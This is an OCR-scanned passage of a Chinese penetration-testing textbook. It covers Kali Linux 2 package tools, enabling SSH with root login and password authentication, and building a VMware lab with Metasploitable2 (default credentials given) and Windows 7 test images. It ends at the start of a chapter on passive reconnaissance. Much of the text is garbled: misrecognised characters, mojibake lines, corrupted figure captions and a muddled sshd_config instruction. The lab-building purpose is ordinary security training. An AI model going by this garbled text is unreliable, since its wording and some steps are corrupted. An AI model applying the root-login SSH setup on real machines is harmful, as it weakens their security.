APT 包 搜索 工具 。 当 我 们 在 编译 源 代码 时 ， 时 有 有 缺少 文件 的 情况 友 生 。 
此 时 ， 通 过 apt-file 束 可 以 找 出 该 喘 失 文件 所 在 的 包 ， 然 后 将 缺失 的 包 
安装 后 即 可 让 编译 顺利 进行 了 。 安 疙 的 命令 开 是 “apt-get install apt- 
file”， 如 图 2-47 所 示 。 


root(Qkali: ~ oo o 


:~# apt-get ins apt-file 
eaqıng package LISTS... VONE 
Building dependency tree 
Reading state information... Done 
he following additional packages will be installed: 
libapt-pkg-perl libexporter-tiny-perl liblist-moreutils-perl 


libregexp-assemble-perl 

he following NEW packages will be installed: 
apt-file libapt-pkg-perl libexporter-tiny-perl liblist-moreutils-perl 
libregexp-assemble-perl 

9 upgraded, 5 newly installed, O to remove and 496 not upgraded. 

eed to get 288 kB of archives. 

After this operation, 775 kB of additional disk space will be used. 





图 2-47 ”安装 apt-file 
安装 完成 之 后 ， 束 可 以 执行 这 个 软件 了 ， 如 图 2-48 所 示 。 


root@kali: ~ oo Q 
File Edit View Search Terminal Help 
:~# apt-file 


[options] action [pattern] 
[options] -f action <file> 
[options] -D action <debfile> 


--fixed-string - Do not expand pattern 
--from-deb - Use file list of .deb package(s) as 
patterns; implies -F 


--from-file - Read patterns from file(s), one per line 
(use '-' for stdin) 

--ignore-case -j Ignore case distinctions 

--substring-match pattern is a substring (no glob/regex) 

- -regexp - pattern is a regular expression 


Search filter options: 


--architecture -a «arch» Use specific architecture [L] 
--Index-names -I «names» Only search indices listed in <names> [LẸ 





图 2-48 ”执行 apt-file 


Kali Linux 2 中 的 及 单 里 的 选项 是 固定 的 ， 如 有 果 我 们 希望 对 其 进行 调 
整 的 话 ， 可 以 使 用 一 球 名 为 alacarte 的 程序 ，Kali Linux 2 并 没有 安装 这 
于 程序。 我 们 可 以 使 用 刚 讲 过 的 方法 来 下 载 并 安装 这 个 程序 ， 输 入 命 
令 “apt-get install alacarte”， 执 行 的 结果 如 图 2-49 所 示 。 


root(Qkali: ~ oo Q 


File Edit View Search Terminal Help 


:-4 apt-get install alacarte 

Reading package lists... Done 
Building dependency tree 
Reading state information... Done 
The following NEW packages will be installed: 

alacarte 
0 upgraded, 1 newly installed, 0 to remove and 496 not upgraded. 
Need to get 111 kB of archives. 
After this operation, 1,209 kB of additional disk space will be used. 
Get:1 http://mirrors.neusoft.edu.cn/kali kali-rolling/main i386 alacarte all 3.1 
1:91-22 PIII KB] 
Fetched 111 kB in 6s (16.7 kB/s) 





2-49 ”安装 alacarte 
安装 完成 之 后 ， 在 终端 中 输入 如 下 命令 : 
root@kali~# alacarte 


alacarte 古 一 丈 图 形 化 操作 软件 ， 局 动 以 后 的 操作 界面 如 图 2-50 所 
7e 


Main Menu o o o0 








HH Applications Show | Item | New Menu | 
bp © 01-Information Gat 








€ 01-Information Gathering 





New It 
> ww 02- Vulnerability An s 02 - Vulnerability Analysis | ECCE | 
è 03 - Web Applicatior 03 - Web Application Analysis New Separator 
s 04- Database Asses s 04- Database Assessment 
Properties 


05 - Password Attacks 

06 - Wireless Attacks Delete 
S 07 - Reverse Engineering 
* 08- Exploitation Tools 
1 09- Sniffing & Spoofing Move Up 
X. 10 - Post Exploitation 
V 11- Forensics 
= 12- Reporting Tools 


» 05 - Password Attacl 
» 06 - Wireless Attack 
SE 07 - Reverse Engine 
* 08- Exploitation Toc 
> > 09- Sniffing & Spoo 
» X 10- Post Exploitatioi 
» v 11- Forensics 





Move Down 


12 - Reporting Tools 
所 13- Social Engineeri X 13 - Social Engineering Tools 

> T | 14- System Service T | 14- System Services 

> B Usual applications & Usual applications 

> Q Wine Q Wine 





[S] [S] [S] [S] [S] [SI [SI [SI [SI [S] [SI [SI FSI FSI 





| Restore System Configuration | | Close | 





图 2-50 alacarte 的 操作 界面 


alacarte 这 个 软件 的 操作 十 分 简单 ， 这 里 不 再 详细 介绍 。 

本 书 中 使 用 的 Kali Linux 2 是 在 虚拟 机 中 运行 的 。 有 时 候 ， 我 们 需要 
在 虚拟 机 Kali Linux 2 系统 和 外 面 的 Windows 系 统 中 共享 文件 ， 为 了 操作 
方便 ， 我 们 可 以 装 上 vmtools， 安 装 的 方法 如 下 : 

root@kali:~#apt-get update 

root@kali:~#apt-get install open-vm-tools-desktop fuse 

执行 的 过 程 如 图 2-51 所 示 。 


:~# apt-get update 
Get:1 http://mirrors.neusoft.edu.cn/kali kaLi-roLLing InRelease [30.5 kB] 
Get:2 http://mirrors.neusoft.edu.cn/kali kali-rolling/main i386 Packages [15.4 M 


B] 
Get:3 http://mirrors.neusoft.edu.cn/kali kali-rolling/non-free i386 Packages [14 
7 kB 


cet:4 http://mirrors.neusoft.edu.cn/kali kali-rolling/contrib i386 Packages [102 
kB 


Fetched 15.7 MB in 17s (908 kB/s) 
Reading package lists... Done 
:~# apt-get install open-vm-tools-desktop fuse 
Reading package lists... Done 
Building dependency tree 
Reading state information... Done 





[|2-51 ”安装 vmtools 
之 后 重新 司 动 系统 : 
root(@ kali:~#reboot 


午 新 局 动 之 后 ， 束 可 以 在 Kali 系 统 和 外 和 面 的 Windows 系 统 中 拖 动 共 
FEL S- 


2.3.4. 对 Kali Linux 2 网 络 进行 SSH 远 程控 制 


有 时 候 我 们 可 能 需要 远程 控制 Kali Linux 2 系统 。 默 认 情 况 下 ，Kali 
Linux2 系 统 并 没有 开始 SSH 服 务 。 如 果 和 希望 远程 使 用 SSH 服 务 连接 到 
Kali Linux 2 的 话 ， 需 要 先 在 Kali Linux 2 中 进行 如 下 设置 。 


首先 来 设置 用 于 连接 的 密 钥 ，Kali Linux 2 中 已 经 预先 配置 好 了 SSH 
的 密 钥 。 但 是 我 们 在 使 用 SSH 服 务 的 时 候 ， 最 好 不 用 这 个 默认 的 密 钥 ， 
而 是 目 己 重新 创建 一 个 新 的 ， 首 先 束 必须 先 停 用 这 个 默认 的 密 铀 。 将 这 


en 密 钥 移动 到 一 个 备份 文件 夹 中 ， 然 后 使 用 如 下 的 命令 创建 一 个 
38m EJ A EH: 


Ef, XXRATHATGTIJFSSHPIEERS HK: 
root@kali:~# cd /etc/ssh/ 


tExX ^ SC F3erp 8| £g —^ 1 b ^T F3€keys backup, HRAFN 
的 密 铀 ， 如 图 2-52 上 所 示 。 


root@kali:/etc/ssh# mkdir keys backup 


<>| M ec En» a= =| 0 00 
©) Recent n m -— E P^ = 

省 Home keys. moduli ssh. config sshd config — ssh host. — ssh. host. 

em backup ecdsa.key ^ ecdsa. key. 

gm Desktop pub 

[| Documents X 3 p 2 

G) Downloads ssh. host. — ssh host. — ssh host. X ssh host. 

f] Music ed/5519. ed25519. rsa. key rsa. key.pub 

key key.pub 


图 2-52 OEWER 
然后 将 上 默认 的 密 乌 移动 到 keys_backup 文 件 夹 中 : 


然后 我 们 使 用 命令 重新 创建 一 个 新 的 密 钥 : 


root@kali:/etc/ssh# dpkg-reconfigure openssh-server 


这 几 条 命令 完整 的 执行 过 程 如 图 2-53 所 示 。 


root@kali: /etc/ssh oo o 


File Edit View Search Terminal Help 


:~# cd /etc/ssh/ 
- # mkdir keys backup 
# mv ssh host * keys backup 
= # dpkg-reconfigure openssh-server 
Creating SSH2 RSA key; this may take some time ... 
2048 SHA256:hHDge6sDu4uGGktQraOyFcGY84-8AR3szel7W59uSeQw root@kali (RSA) 


Creating SSH2 ECDSA key; this may take some time ... 

256 SHA256:n+olYszTwxjVOSKbAbglCa65eF8rhIelGCq6Vc9Bf+w root@kali (ECDSA) 

Creating SSH2 ED25519 key; this may take some time ... 

256 SHA256:DGwPEb/HLIWnXahcYlOTqMj+G7I4/qNCXcILd6mN7m4 root@kali (ED25519) 
- # 





图 2-53 ”对 密 钥 的 操作 


我 们 可 以 将 新 生成 的 密 钥 的 md5 值 与 之 前 默认 的 md5 值 相 比 较 ， 如 
图 2-54 所 示 。 


root@kali: /etc/ssh/keys_backup ooo 


File Edit View Search Terminal Help 

:-4 cd /etc/ssh 

# md5sum ssh host * 
c5b2ba6913ccd425aa0048093c2b60ad ssh host ecdsa key 
a4a0933faccdfc62e7517f3036371585 ssh host ecdsa key .pub 
03c018ae6de39628820b4f0c391ad92b ssh host ed25519 key 
95aa6bdb0984b21c0636c2a64bd9aeee ssh host ed25519 key.pub 
8974255d312f6ae50d96006721dbc6b3 ssh host rsa key 
ff222d485694809c4811919be2883791 ssh host rsa key.pub 

# cd keys backup 
# md5sum ssh host * 

89d478ad595aeb0b95fc0e7ed128ddaa ssh host ecdsa key 
794f72ab536cbaab3282el2bdec08d45 ssh host ecdsa key.pub 


76630a2046f880f062761c7ca20d8220 ssh host ed25519 key 
da55d908a55d7f624edd130d2759af2a ssh host ed25519 key.pub 
cd8f0120863423ca62468e8100al2ecd ssh host rsa key 
ad7c78850732e5d138abe192c58747af ssh host rsa key.pub 


*yu 





图 2-54 将 两 个 密 钥 进行 比较 


修改 sshd_config 文 件 ， 访 文件 的 目录 位 于 /etc/ssh/sshd_config， 如 图 
2-55 上 所 示 。 


# To disable tunneled clear text passwords, change to no here! 
/PasswordAuthentication yes 
PermitEmptyPasswords no 






"cU 


# Change to yes to enable challenge-response passwords (beware issues with 
# some PAM modules and threads) 
ChallengeResponseAuthentication no 


# Kerberos options 
ZKerberosAuthentication no 
ZKerberosOrLocalPasswd yes 
ZKerberosTicketCleanup yes 
ZKerberosGetAFSToken no 


图 2-55 ”修改 sshd_config 文 件 


将 #PasswordAuthentication yes 的 注释 去 掉 ， 然 后 将 
PermitEmptyPasswords no 修改 为 PermitRootLogin yes， 如 图 2-56 所 示 。 


| Open ~» | n an- od | CEN = o0 








# For this to work you will also need host jT in /etc/ssh/ssh known hosts 
ZHostbasedAuthentication no 

3 Change to yes if you don't trust -/.ssh/known hosts for 

# HostbasedAuthentication 

ZIgnoreUserKnownHosts no 

# Don't read the user's -/.rhosts and -/.shosts files 

ZIgnoreRhosts yes 


# To disable tunneled clear text passwords, change to no here! 
PasswordAuthentication yes 
PermitRootLogin yes 


图 2-56 ”修改 之 后 的 sshd_config 文 件 
接 下 来 ， 我 们 在 终 并 中 局 动 SSH 服 务 ， 使 用 的 命令 如 下 : 


执行 的 结果 如 图 2-57 所 示 。 


:~# /etc/init.d/ssh start 
[ ] Starting ssh (via systemctl): ssh.service. 
:~# 





图 2-57 ”启动 SSH 服 务 


如 果 你 想 查 看 SSH 服 务 运行 状态 的 话 ， 可 以 使 用 以 下 命令 ， 如 图 2- 
58 上 所 示 。 


root@kali:~#netstat -antp 


:~# netstat -antp 
Active Internet connections (servers and established) 
Proto Recv-Q Send-Q Local Address Foreign Address State 
PID/Program name 


0 0.0.0.0:22 B.B.B8;5;* LISTEN 


3-6. LISTEN 





图 2-58 查看 SSH 服 务 运行 状态 


可 以 看 到 目前 SSH 服 务 已 经 在 22 端 口上 运行 起 来 了 。 


现在 我 们 在 万 外 一 从 


算 机 上 使 用 SSH 服 务 来 远程 控制 Kali Linux 
E 


元 程 登录 ， 其 工作 界面 如 图 2-59 所 示 。 


ES PuTTY Configuration 


Category: 
- Session. 
= Logging 
3 Terminal 
Weine 
… Bell 
- Features 
: Window 
|" Appearance 
: pe Behaviour 
Nu :i Lacke 
|^ i- Selection 
| i. Colours 
"m Connection 








Basic options for your PuTTY session 
Specify the destination you want to connect to 
Host Mame (or IP address) 
192.168.169.130 
Connection type: 
Raw ©) Telnet Hlogin 9! 55H Serial 
Load, save or delete a stored session 


Saved Sessions 


| Default Settings 


Close window on exit: 
Always Mever © Only on clean exit 


[aes —) ES 


图 2-59 PuTTY 的 工作 界面 


PuTTY 的 使 用 很 简单 ， 
可 ， 如 图 2-60 所 示 。 


只 需要 输入 目标 的 IP 地 址 和 要 使 用 的 端口 即 





图 2-60 


远程 连接 到 Kali Linux 2 


2.3.5 Kali Linux 2 的 更 新 操作 


我 们 需要 经 常 性 地 对 Kali Linux 2 系统 进行 升级 操作 。 一 种 升级 的 方 
法 是 使 用 APT， 我 们 也 可 以 使 用 APT 来 对 整个 Kali Linux 2 系统 进行 更 
新 。APT 中 最 为 党 用 的 几 个 升级 命令 如 下 。 


e apt-get update: 使 用 这 条 命令 是 为 了 同步 /etc/apt/sources.list 中 列 出 
的 源 的 索引 ， 这 样 才 能 获取 到 了 最 新 的 软件 包 。 

e apt-get upgrade: 这 条 命令 是 用 来 安装 etc/apt/sources.list 中 所 列 出 来 
的 所 有 包 的 最 新 版 本 。Kali Linux 2 中 所 有 软件 都 会 被 更 新。 这 条 命 
令 并 不 会 改变 或 删除 那些 没有 更 独 操 作 的 软件 ， 但 是 也 不 会 安 疙 当 
前 系统 不 存在 的 软件 。 

e apt-get dist-upgrade: 会 将 软件 包 升 级 到 最 新 版 本 ， 并 安 疙 狐 引 入 的 
依赖 包 。 除了 提供 upgrade 的 全 部 功能 外 ， 并 智能 处 理 新 版 本 的 依 
TL A Ir] jl e 


RATA RAT UL Pf 396 n] EAE ENDS AS EET ECT o 


root@kali:~#apt-get update 
root@kali:~#apt-get upgrade 


e ix^ SOCSHBDSDEÉC RA RERIA&S me DR ERE. 


24 VMware 的 高 级 操作 


在 进行 渗透 测试 的 学 习 时 ， 我 们 有 很 多 技术 不 能 百 接应 用 在 真实 世 
界 中 ， 因 为 这 些 技 术 的 破坏 性 可 能 会 市 来 法 律 上 的 问题 。 如 来 我 们 能 拥 
有 一 个 属于 上 日 己 的 网 络 安全 渗透 实验 宇 ， 将 会 古 一 个 非常 理想 的 选择 。 
将 现实 中 的 网 络 ， 在 实验 室 中 柑 拟 出 来 ， 这 样 我 们 就 可 以 更 好 地 研究 各 
种 渗透 负 斌 的 方法 ， 而 不 必 担 心 以 此 引 及 的 后 琳 。 


不 过 假想 一 下 ， 我 们 即使 是 模拟 一 个 只 有 5 合计 算 机 的 网 络 ， 那 么 
也 需要 喇 用 不 小 的 空间 ， 而 且 切 换 看 对 这 些 设 备 进行 调 弃 也 十 分 麻烦 。 
不 过 好 在 除了 使 用 真实 设备 之 外 ， 我 们 还 有 一 个 选择 ， 那 束 是 使 用 虚拟 
机 。 使 用 VMware 虚 拟 机 软件 就 可 以 在 一 台 计 算 机 上 模拟 出 多 台 完 全 不 
同 的 计算 机 来 。 这 样 你 只 需要 一 台 计 算 机 束 可 以 建立 一 个 网 络 安 全 渗透 
实验 室 了 。 妆 然 这 台 计 算 机 的 便 件 配置 要 越 蜗 越 好 ， 其 中 有 影响 最 大 的 个 
件 束 是 内 存 ， 最 好 使 用 8GB 以 上 的 内 存 。 


在 第 2.2 节 Kali Linux 2 安装 中 ， 我 们 提 到 了 VMware 的 安装 方法 。 接 
下 来 ， 我 们 就 来 了 解 如 何 使 用 YMware 来 建立 一 个 网 络 渗透 实验 室 。 


2.4.1 在 VMware 中 安装 其 他 操作 系统 


1. 安装 Metasploitable2 


Metasploitable2 古 一 个 专门 用 来 进行 渗透 测试 的 又 机 。 这 个 有 耻 机 上 
存在 着 大量 的 漏洞 ， 这 些 漏洞 正好 是 我 们 学 习 Kali Linux 2 时 最 好 的 练 
习 对 象 。 这 个 园 机 的 安装 文件 是 一 个 VMware 虚拟 机 镜像 ， 我 们 可 以 将 
这 个 镜像 下 载 下 来 使 用 ， 使 用 的 步骤 如 下 : 


步骤 1 首先 从 
https://sourceforge.net/projects/metasploitable/files/Metasploitable2/ F £X, 
Metasploitable2 942 B] Hs*fi 8h, JEWEL DRAT ARRENE e 


步 又 2 ”下 载 完 成 后 ， 将 下 载 下 来 的 metasploitable-Linux-2.0.0.zip 文 
TERRE HH e 


步骤 3 ” 接 下 来 启动 VMWare， 然 后 在 菜单 栏 上 单 击 “文件 ”“ 打 
开 ”， 然 后 在 弹出 的 文件 选择 框 中 选中 你 刚 解压 缩 文 件 夹 中 的 


Metasploitable.vmx. 


步骤 4 ”现在 这 个 Metasploitable2 束 会 出 现在 你 左 侧 的 虚拟 系统 列表 
中 了 。 早 击 束 可 以 打开 这 个 系统 。 


步骤 5 对 虚拟 机 的 设置 不 需要 更 改 ， 但 是 要 注意 的 古 ， 网 络 连接 
处 要 选择 “NAT”， 如 图 2-61 所 示 。 


| 设备 摘要 | REUS 

| B 1E 2 GB | EC) 

| [2 处 理 器 4 4| 启动 时 连接 (D) 
上 < 硬盘 (5C5]) 40 GB 

| © CD/DVD (IDE) 自动 检测 | Pedir 


桥接 模式 (B): 直接 甘 接 物理 了 网络 
夏 制 物理 了 网络 连接 状态 忆 





| METZ 自动 检测 © NAT 183£(N): 用 于 共享 主机 的 PP 地址 
REREH): 与 主机 共享 的 专用 网 络 
2 Bise x (U): 特定 虚拟 网 络 
VMnet0 (自动 桥接 ， 
LAN 区 段 (L): 








|LAN 区 段 (5)… | | 高 级 (VW).… | 





图 2-61 ”Metasploitable2 的 网 络 连接 方式 


步骤 6 现在 Metasploitable2 束 可 以 正 沿 使 用 了 。 我 们 在 系统 名 称 
单 击 耻 标 右键 ， 然 后 依次 选中 电源 /局 动 客户 机 ， 台 可 以 打开 这 个 虚拟 
机 了 。 系 统 可 能 会 弹出 一 个 荣 单 ， 选 择 “I copied it" Bl H. 


步骤 7 ”使 用 “msfadmin” 作 为 用 户 名 , “msfadmin” 作 为 密码 登录 这 
个 系 Z2 
| ZAIN ZÀ Oo 


步骤 8 成功 登 录 以 后 ，VMware 已 经 为 这 个 系统 分 配 了 IP 地 址 。 现 
在 我 们 就 可 以 使 用 这 个 系统 了 。 


2. Z3: Windows 7 虚拟 机 


我 们 平时 进行 渗透 测试 的 目标 是 以 Windows 为 主 ， 所 以 这 里 我 们 还 
应 该 搭 建 一 个 Windows 操 作 系 统 作 为 又 机 。 这 里 有 两 个 选择 ， 如 琳 你 有 
一 个 Windows 7 的 安 痛 盘 的话 ， 那 么 瓯 可 以 在 虚拟 机 中 安 猴 这 个 系统 。 
另外 我 建议 你 最 好 到 https:/developer. microsoft.com/en-us/microsoft- 
edge/tools/vms/ 下 载 微软 提供 的 测试 镜像 。 在 这 个 地 址 中 微软 提供 了 如 
图 2-62 所 示 的 各 种 系统 的 虚拟 机 镜像 ， 利 用 这 些 锐 人像， 渗透 测试 者 可 以 
极为 方便 地 对 各 种 系统 和 浏 贤 器 进行 测试 。 


Download virtual machines 


Test Microsoft Edge and versions of IE8 through IE11 using free virtual 
machines you download and manage locally. 


Select a download 


Virtual machine 


IE8 on Win? (x86) vA 


Select one 
IE8 on Win7 (x86) 
IE9 on Win7 (x86) 
IE10 on Win7 (x86) 
[E11 on Win7 (x86) 
IE11 on Win81 (x86) 
Microsoft Edge on Win10 (x64) Stable (15.15063) 
| Microsoft Edge on Win10 (x64) Preview (16.16232) 


图 2-62 ”微软 提供 的 操作 系统 镜像 列表 


这 里 我 们 下 载 其 中 的 “IE8 on Win7 (x86) ”作为 对 机 ， 使 用 的 方法 
和 之 前 的 一 样 ， 不 再 进行 介绍 。 


2.4.2 VMware 中 的 网 络 连 接 


我 们 可 以 按照 自己 的 想法 在 VMware 中 建立 任意 的 网 络 拓扑 。 在 之 
前 的 草 世 中 我 们 已 经 提 到 过 NAT 的 概念 了 ， 实 际 上 VMware 中 使 用 了 一 
个 名 为 VMnet 的 概念 ， 在 VMware 中 每 一 个 VMnet 束 相当 于 一 个 交换 
机 ， 连 接 到 了 同一 个 VMnet 下 的 设备 束 都 同 处 于 一 个 子 网 内 ， 你 可 以 在 
I 中 单 击 “编辑 ”虚拟 网 络 编辑 器 ?来 在 看 VMnet 的 设置 ， 如 图 2-63 
ZJN o 





E 
Q 店 拟 网 络 编辑 器 














o ed- 
名 称 类 型 外 部 连接 主机 连接 DHCP 子 网 地 址 
VMnet0 = : : - 
VMneti REH.. - 已 连接 Baum 192.168.80.0 
VMnet8 NAT 模式 ”NAT 模式 已 连接 已 启用 192. 168. 169.0 
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这 里 面 只 有 VMnet0、VMnet1、VMnet8 这 3 个 子 网 ， 当 然 我 们 还 可 
以 添加 更 多 的 网 络 ， 这 3 个 子 网 分 别 对 应 着 VMware 虚拟 机 软件 中 提供 的 
3 种 进行 设备 互联 的 方式 ， 分 别 是 桥接 、NAT、 仅 主机 模式 。 这 些 连 接 
方式 与 VMvare 中 的 虐 拟 网 卡 是 相互 对 应 的 。 


e VMnet0: 这 是 VMware 用 于 虚拟 桥接 网 络 下 的 虚拟 交换 机 。 
e VMnetl: 这 是 VMware 用 于 虚拟 仪 主机 模式 网 络 下 的 虚拟 交换 机 。 
e VMnet8: 这 是 VMware 用 于 虚拟 NAT 网 络 下 的 虚拟 交换 机 。 


的 网 卡 ， 分 别 是 VMware Network Adapter VMnet1 和 VMware Network 
Adapter VMnet8， 如 图 2-64 所 示 。 


| w" VMware Network Adapter | w" VMware Network Adapter 
^ ë VMhnetl -* VMnets 
«4 Gsm 4 omg 


图 2-64 多 出 的 两 块 虚 拟 网 卡 


VMware Network Adapter VMnet1: ixiéHostH] T 5 Host-Only KEH 
网 络 进行 通信 的 虚拟 网 卡 。 


VMware Network Adapter VMnet8: 这 是 Host 用 于 与 NAT 虚 拟 网 络 


进行 通信 的 虚拟 网 卡 。 
我 们 来 看 一 下 这 3 种 连接 方式 的 不 同 之 处 。 
1. NAT 网 络 


这 是 VMware 中 一 种 最 为 党 用 的 联网 檬 式 ， 这 种 连接 方式 使 用 的 是 
VMnet8 虚 拟 交 换 机 。 同 处 于 NAT 网 络 模 式 下 的 系统 通过 VMnet8 交 换 机 
进行 通信 。NAT 网 络 模 式 下 的 IP 地 址 、 子 网 掩 码 、 网 关 和 DNS 服 务 器 都 
是 通过 DHCP 分 配 的 。 而 该 模式 下 的 系统 在 与 外 部 通信 的 时 候 使 用 的 是 
虚拟 的 NAT 服 务 器 。 


2. 桥接 网 络 


这 种 模式 很 容易 理解 ， 几 是 选择 使 用 桥接 网 络 的 系统 束 好 像 古 局 域 
网 中 的 一 个 独立 的 主机 ， 束 古 和 你 真实 的 计算 机 一 柑 一 样 的 主机 ， 并 且 
它 也 连接 到 了 这 个 真实 的 网 络 。 因 此 如 来 我 们 要 这 个 系统 联网 的 话 ， 束 
南 要 将 这 个 系统 和 外 面 的 真实 主机 采用 相同 的 设置 方法 。 
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连通 的 ， 但 是 默认 是 不 会 连接 到 外 部 网 络 的 ， 这 样 我 们 在 进行 网 络 实 验 
(无 其 是 蠕虫 病毒 ) 时 吏 不 会 担心 传播 到 外 部 。 


在 本 书 中 我 们 将 所 使 用 的 虚拟 机 都 采用 了 NAT 联 网 模式 ， 这 样 既 可 
以 保证 虚拟 系统 的 互联 ， 也 能 保证 这 些 系统 连接 到 外 部 网 络 。 
2.4.3 VMware 中 有 的 快照 与 元 隆 功 能 


1. VMware 的 快照 功能 


在 进行 渗透 测试 的 时 候 ， 经 常会 引起 系统 的 崩溃 。 如 果 每 一 次 系统 
崩溃 ， 我 们 都 要 进行 系统 重 装 的 话 ， 屠 和 这 个 工作 量 也 是 相当 之 大 的 。 
VMware 中 提供 了 一 个 系统 快照 的 功能 ， 这 个 快照 类 似 于 我 们 平时 所 使 
用 的 “系统 备份 "功能 ， 这 个 功能 可 以 将 系统 当前 状态 记录 下 来 ， 如 果 需 


要 的 话 ， 可 以 随时 恢复 到 快照 时 的 状态 。 通 第 我 们 在 对 Kali Linux 2 进行 
升级 之 前 ， 或 者 对 目标 系统 进行 渗透 之 前 都 会 对 系统 进行 快照 。 如 有 果 升 
级 失败 或 者 渗透 导致 系统 不 可 正常 使 用 时 ， 再 恢复 快照 。 


创建 快照 的 操作 很 简单 : 


D 启动 虚拟 机 ， 在 菜单 中 单 击 “虚拟 机 "， 然 后 在 下 拉 菜 单 中 移 
中 “快照 选项 ， 然 后 单 击 “ 拍 摄 快照”。 


] 2) 在 “拍摄 快照 ”窗口 中 填 入 快照 的 名 字 和 注释 ， 单 击 “ 扣 摄 快 
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如 条 我 们 需要 将 当前 的 虚拟 机 恢复 到 快照 时 的 状态 ， 同 样 要 在 沫 单 
中 里 击 “ 虚 拟 机 ”A 快照 >?， 在 弹出 的 采 单 选中 要 恢复 的 快照 名 称 即 可 。 


2. VMware 的 克隆 功能 


当 我 们 需要 模拟 一 个 拥有 3 个 Windows 7 操作 系统 的 网 络 时 ， 无 需 一 
个 个 地 安装 应 拟 机 ， 只 需要 在 创建 了 一 个 应 所 机 之 后 ， 拟 行 两 次 克隆 扣 
即 可 


苑 隆 是 一 种 和 快照 很 像 的 操作 ， 但 是 两 者 义 有 看 明 旺 的 不 同 。 快 照 
和 克隆 部 是 对 操作 系统 菏 一 时 刻 的 状态 进行 的 备份 。 但 是 快照 不 能 独立 
运行 ， 必 须要 在 原来 系统 的 基础 上 才能 运行 。 而 殉 隆 可 以 脱离 原来 系统 
运行 ， 一 旦 匈 隆 完成 ， 克 隆 的 系统 与 原来 的 虚拟 机 是 相对 独立 的 ， 可 以 
看 作 是 两 个 互 不 相干 的 系统 。 而 且 VMware 在 克隆 的 时 候 ， 会 给 新 系统 
一 个 MAC 地 址 。 这 样 原 来 的 系统 和 克隆 的 系统 就 可 以 同 处 于 一 个 网 络 
而 不 会 及 生 冲 突 ， 创 建 一 个 克隆 的 方法 如 下 。 


1) 局 动 虚拟 机 ， 在 末 蛙 中 蛙 击 “虚拟 机 ”， 然 后 在 下 拉 采 里 中 选 
中 “管理 ”选项 ， 然 后 早 击 “克隆 ”。 


2) 在 虚拟 机 克隆 问 吐 中， 系统 会 要 求 选择 一 个 克隆 源 ， 这 个 克隆 
源 可 以 是 虚拟 机 的 当前 状态 ， 也 可 以 是 茶 一 快照 的 状态 ， 根 据 实 际 需 求 
作出 选择 即 可 。 


3) 克隆 方法 处 有 两 个 选项 “创建 链接 克隆 ”和 “创建 完整 克隆 ”"。 链 
接 殉 隆 产 生 的 文件 占用 硬盘 更 小 ， 但 是 必须 能 够 访问 原始 的 虚拟 机 时 才 


能 使 用 。 完 整 克 隆 则 完全 独立 ， 可 以 在 任何 地 方 使 用 ， 但 是 占用 的 硬盘 
空间 较 大 。 通 常 我 们 在 一 台 计算 机 上 做 实验 的 话 ， 建 议 选 择 链接 克隆 。 


4) 选择 保存 克隆 文件 的 地 址 ， 然 后 执行 到 完成 即 可 。 


D 操作 绍 束 之 后 ， 在 虚拟 机 左 侧 的 操作 系统 列表 处 束 会 出 现 一 个 
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3. VMware 导出 虚拟 机 


如 有 末 你 厦 望 将 目 己 所 使 用 的 虚拟 机 镜像 转移 到 其 他 计算 机 上 ， 或 者 
提供 给 其 他 人 使 用 的 时 候 〈 就 像 Kali 官 方 提 供 的 镜像 那样 ) ， 我 们 也 可 
以 选择 将 虚拟 机 导出 成 一 个 文件 ， 这 个 文件 移动 到 其 他 任何 一 个 装 有 
VMware 的 计算 机 上 都 可 以 运行 了 。 


操作 的 方法 是 首先 在 左 侧 操 作 系 统 列表 中 选中 日 标 系 统 ， 注 意 此 时 
的 系统 应 该 处 于 关 团 状态 ， 然 后 单 击 来 单 栏 上 的 “文件 ”导出 为 OVF?”， 
在 弹出 的 文件 对 话 框 选 中 要 保存 的 位 置 即 可 。 生 成 的 OVE 文 件 束 可 以 在 
其 他 装 有 VMware 的 计算 机 中 运行 了 。 


25 ”小 结 


在 这 一 半 中 ， 我 们 详细 地 讲解 了 Kali Linux 2 的 安装 和 使 用 。Kali 
Linux 2 提供 了 多 种 安装 方法 ， 我 们 可 以 将 其 安装 在 便 稚 上， 也 可 以 将 其 
USES Er JUS E. 


三 方 软 件 ， 更 改 程序 菜单 ， 对 系统 进行 升级 ， 为 系统 配置 网 络 等 操作 。 


最 后 我 们 还 介绍 了 建立 渗透 测试 实验 宇 的 关键 软 件 一 VMware 的 
安装 和 使 用 ， 详 细 地 讲解 了 VMware 中 网 络 模 式 的 配置 、 轰 机 的 安装 、 
快照 和 元 隆 等 操作 。 


在 下 一 章 ， 我 们 将 会 正式 开始 网 络 安 全 渗透 测试 之 旅 ， 首 先 我 们 先 
要 学 习 如 何 完成 信息 收集 阶段 的 被动 扫描 。 


第 3 章 
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看 起 来 世界 上 好 像 没有 任何 监狱 可 以 关 得 住 雷 布雷 斯 林 ， 可 十 他 
义 是 怎么 完成 这 些 任 务 的 呢 ? 在 影片 刚 开 始 不 久 的 时 候 ， 埋 :布雷 斯 林 
给 出 了 他 越狱 必需 的 3 个 条 件 : 


。 必 须 熟 悉 整个 监狱 的 布局 ; 
。 必 须 摸 清 看 守 人 员 和 犯人 的 日 常规 律 ， 
。 不 能 孤军 奋战 ， 必 须 得 到 里 应 或 者 外 合 。 


我 们 看 过 的 大 部 分 有 越狱 情节 的 电影 都 是 犯人 直接 打倒 看 守 ， 然 后 
一 路 杀 出 监狱 。 而 《人 金 蝉 脱 壳 》 却 不 是 ， 雷 :布雷 斯 林 巧 妙 地 利用 了 监 
狱 中 的 一 切 细节 ， 这 也 是 这 部 电影 最 为 精彩 的 地 方 。 


网 络 安全 渗透 测 试 也 不 是 一 门 单纯 的 科学 ， 而 古 由 多 个 学 科 区 叉 而 
成 。 其 中 一 个 重要 的 组 成 部 分 正和 是 情报 学 。 埋 :布雷 斯 林 给 出 越狱 的 前 
两 个 条 件 正 属于 情报 学 的 范 明 。 在 网 络 安全 渗透 测试 中 ， 有 经 验 的 专家 
大 痢 会 在 信息 收集 阶段 化 费 最 多 的 时 间 。 如 条 想 对 一 个 目标 进行 完整 的 
测试 ， 那 么 我 们 知道 的 应 访 比 用 户 目 己 偿 要 多 得 多 。 可 和 古 这 里 很 多 新 手 
会 有 一 个 疑问 ， 我 们 如 何 才 能 获得 目标 的 信息 呢 ? 获得 信息 的 方法 可 以 
分 成 两 种 ， 被 动 扫 插 和 主动 扫 插 两 种 。 


裤 动 扫描 主要 指 的 是 在 目标 无 法 穴 觉 的 情况 下 进行 的 信息 收集 ， 比 
如 我 们 如 条 力 了 解 一 个 远 在 天 按 的 人 ， 你 会 怎么 做 呢 ? 显然 我 们 可 以 选 
